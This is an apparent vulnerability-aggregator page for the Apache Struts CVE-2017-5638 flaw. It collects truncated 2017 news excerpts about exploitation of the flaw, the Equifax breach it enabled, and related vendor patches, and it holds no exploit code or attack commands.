Oracle patched 250 vulnerabilities across hundreds of different products as part of its quarterly Critical Patch Update released today.
Rounding out the list of products with the most patches is Oracle Fusion Middleware with 38, Oracle Hospitality Applications with 37 and Oracle MySQL with 25.
Of the critical patches, security researchers at Onapsis said that they identified three high-risk SQL injections vulnerabilities in Oracle’s popular Oracle E-Business Suite (EBS).
“W...

The Register • Simon Sharwood • 04 Oct 2017

Someone failed to order the patch. If it was you, c'mere, have a hug. And a new identity

Recently-and-forcibly-retired Equifax CEO Rick Smith has laid the blame for his credit-check biz's IT security breach on a single member of the company's security team.
In testimony on Tuesday before a US House subcommittee on consumer protection, Smith explained that Equifax has a protocol whereby news of important software patches is communicated to the appropriate people within a certain time. When details of security vulnerability CVE-2017-5638 landed in March 2017, bearing bad news ab...

The Register • Simon Sharwood • 04 Oct 2017

Someone failed to order the patch. If it was you, c'mere, have a hug. And a new identity Equifax CEO falls on his sword weeks after credit biz admits mega-breach

Threatpost • Chris Brook • 03 Oct 2017

Equifax, the credit agency behind this summer’s breach of 143 million Americans, said this week the number of victims implicated in the breach has increased.
Paulino do Rego Barros, Jr., the company’s interim CEO, announced Monday that 2.5 million additional Americans were also impacted, bringing the grand total to 145.5 million affected individuals.
Equifax initially called its investigation around the breach “substantially complete,” but said it was still carrying out furth...

The Register • Richard Chirgwin • 02 Oct 2017

Ex-CEO says company stayed silent about hack to stop crims piling on with more attacks

Equifax was just as much of a trash-fire as it looked: the company saw the Apache Struts 2 vulnerability warning, failed to patch its systems, and held back a public announcement for weeks for fear of “copycat” attacks.
Those Infosec for Absolute Dummies tips were made official by ex-CEO Richard Smith, by way of evidence published by a US House committee ahead of his in-person appearance Tuesday.
Smith's written statement [PDF] to the House Committee on Energy and Commerce says t...

The Register • Richard Chirgwin • 02 Oct 2017

Ex-CEO says company stayed silent about hack to stop crims piling on with more attacks

Threatpost • Chris Brook • 26 Sep 2017

Oracle released fixes for a handful of recently patched Apache Struts 2 vulnerabilities, including a critical remote code execution vulnerability (CVE-2017-9805) that could let an attacker take control of an affected system, late last week.
The Apache Software Foundation patched the RCE vulnerability, which affects servers running apps built using the Struts framework and its REST communication plugin, earlier this month.
Scores of Oracle products, roughly two dozen in total, are aff...

The Register • John Leyden • 20 Sep 2017

Those are just the ones known to have downloaded outdated versions

Thousands of companies may be susceptible to the same type of hack that recently struck Equifax.
The Equifax breach was the result of a vulnerable Apache Struts component. Software automation vendor Sonatype warns that 3,054 organisations downloaded the same Struts2 component exploited in the Equifax hack in the last 12 months. The affected version of Struts2 was publicly disclosed as vulnerable (CVE-2017-5638) on March 10, and was subsequently exploited at Equifax between May and late Jul...

The Register • John Leyden • 20 Sep 2017

Those are just the ones known to have downloaded outdated versions

The Register • Simon Sharwood, APAC Editor • 17 Sep 2017

Company tried to find and patch vulnerable systems, but we know what happened next

Equifax's chief information officer and chief security officer “are retiring” and the company has admitted it knew Apache Struts needed patching in March, but looks to have fluffed attempts to secure the software.
The retirements and more details about the company's mega-breach are revealed in a new entry to equifaxsecurity2017.com in which the company describes what it knew, when it knew it, and how it responded.
The update reveals that the the attack hit the company's “U.S. o...

The Register • Simon Sharwood • 17 Sep 2017

Company tried to find and patch vulnerable systems, but we know what happened next

BleepingComputer • Catalin Cimpanu • 16 Sep 2017

In a press release published late Friday night, credit rating and reporting firm Equifax revealed new details about the security breach that
, and also announced the immediate retirement of two high-ranking executives.
Equifax says that breach came to light on July 29 when its security team observed suspicious traffic from its US online dispute portal. Its security team blocked the traffic, but the next day, July 30, more suspicious activity was discovered.
Realizing that some...

The Register • John Leyden • 15 Sep 2017

Help wanted at Equifax. Badly

Further evidence has emerged regarding the insecurity of Equifax’s web setup, as independent security researcher Scott Helme reports having uncovered all manner of problems with Equifax’s security header configuration.
The finding from Helme comes as a date was confirmed for the Equifax CEO to appear before Congress earlier next month, and the FTC said it was investigating the credit reference agency.
“Many of the headers are more about addressing the basics, but as a site that...

The Register • John Leyden • 15 Sep 2017

Help wanted at Equifax. Badly

Threatpost • Chris Brook • 14 Sep 2017

Equifax said the culprit behind this summer’s massive breach of 143 million Americans was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.
The bug was widely assumed by experts to be the “U.S. website application vulnerability” implicated by the company last Thursday, especially after an Apache spokeswoman told Reuters on Friday that it appeared the consumer credit reporting agency hadn’t applied patches for flaws discovered earlier this year.
On We...

The Register • Simon Sharwood, APAC Editor • 14 Sep 2017

Apache Struts was popped, but company had at least TWO MONTHS to fix it

Equifax has revealed that the cause of its massive data breach was a flaw it should have patched weeks before it was attacked.
The company has updated its www.equifaxsecurity2017.com/ site with a new “A Progress Update for Consumers” that opens as follows:
As the Apache Foundation pointed out earlier this week, it reported CVE-2017-5638 in March 2017. Doubt us? Here's the NIST notification that mentions it as being notified on March 10th.
Equifax was breached in “mid-May�...

BleepingComputer • Catalin Cimpanu • 14 Sep 2017

In an update posted to its security breach website, Equifax said hackers used an Apache Struts security bug to breach its servers and later
, from both the US and the UK. We quote:
Equifax's confirmation comes after
from equity research firm Baird circulated last week blaming the same flaw.
At the time it was discovered, in March 2017, the Apache Struts CVE-2017-5638 vulnerability
— a term used to describe security bugs exploited by attackers but which vendor...

The Register • Simon Sharwood • 14 Sep 2017

Apache Struts was popped, but company had at least TWO MONTHS to fix it

The Register • John Leyden • 13 Sep 2017

Hold our beers, Equifax

Updated Experian and Annual Credit Report.com – an organization set up by Equifax, Experian and Transunion to meet US consumer finance regulations – left themselves exposed to a serious vulnerability in Apache Struts earlier this year.
The security shortcoming raises important questions following the disclosure of a mega-breach at Equifax last week that affected data on 143 million Americans and an as-yet unknown number of Canadians and Brits. Equifax only said that an unspecified web ...

The Register • John Leyden • 13 Sep 2017

Hold our beers, Equifax

Threatpost • Chris Brook • 11 Sep 2017

A group of developers behind Apache Struts, believed by some to be the culprit behind last week’s Equifax breach, took umbrage with those claims over the weekend.
René Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it’s unclear which vulnerability, if any was exploited.
The letter, which was written on behalf of the Struts PMC, was spurred by an internal analyst report...

BleepingComputer • Catalin Cimpanu • 11 Sep 2017

Cisco has initiated a mass security audit of all its products that incorporate a version of the Apache Struts framework, recently affected by a series of vulnerabilities, one of which is under active exploitation.
Cisco engineers will test all the software products for four Apache Struts security bugs disclosed last week.
The company is keeping a list of To-Be-Tested, Vulnerable, and Confirmed Not Vulnerable products in two security advisories,
and
.
The first Ci...

Threatpost • Tom Spring • 05 Sep 2017

The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.
All web applications using the framework’s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.
“This particular vulnerability allows a remote attacker t...

BleepingComputer • Catalin Cimpanu • 06 Apr 2017

For more than a month, at least ten groups of attackers have been compromising systems running applications built with Apache Struts and installing backdoors, DDoS bots, cryptocurrency miners, or ransomware, depending if the machine is running Linux or Windows.
For their attacks, the groups are using a
, disclosed and immediately fixed last month by Apache.
The vulnerability, CVE-2017-5638, allows an attacker to execute commands on the server via content uploaded to the Jakart...

Threatpost • Michael Mimoso • 09 Mar 2017

Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was patched and proof-of-concept exploit code was introduced into Metasploit.
The vulnerability, CVE-2017-5638, was already under attack in the wild prior to Monday’s disclosure, but since then, the situation has worsened and experts fear it’s going to linger for a while.
“The second someone starts working on a Me...

The Register • Richard Chirgwin • 09 Mar 2017

Black hats testing remote code execution zero-day vulnerability

Infosec researchers have found a “dire” zero-day in Apache Struts 2, and it's under active attack.
If you're a sysadmin using the Jakarta-based file upload Multipart parser under Apache Struts 2, Nick Biasini of Cisco's Talos advises applying the latest upgrade immediately.
CVE-2017-5638 is documented at Rapid7's Metasploit Framework GitHub site.
Talos's input adds urgency to getting the upgrade, because the organisation “found a high number of exploitation events. The ma...

The Register • Richard Chirgwin • 09 Mar 2017

Black hats testing remote code execution zero-day vulnerability

BleepingComputer • Catalin Cimpanu • 09 Mar 2017

Cisco's Talos security team announced it discovered attacks against a zero-day vulnerability in Apache Struts, which Apache
on Monday.
According to its website, "
is a free, open-source, MVC framework for creating elegant, modern Java web applications. It favors convention over configuration, is extensible using a plugin architecture, and ships with plugins to support REST, AJAX and JSON."
The vulnerability, CVE-2017-5638, allows an attacker to execute commands on the ...

Get Started

CVE-2017-5638

Vulnerability Summary

Most Upvoted Vulmon Research Post

Vulnerability Trend

Vendor Advisories

Exploits

Mailing Lists

Nmap Scripts

Metasploit Modules

Github Repositories

Recent Articles

References

Vulmon Search

About

Products

Connect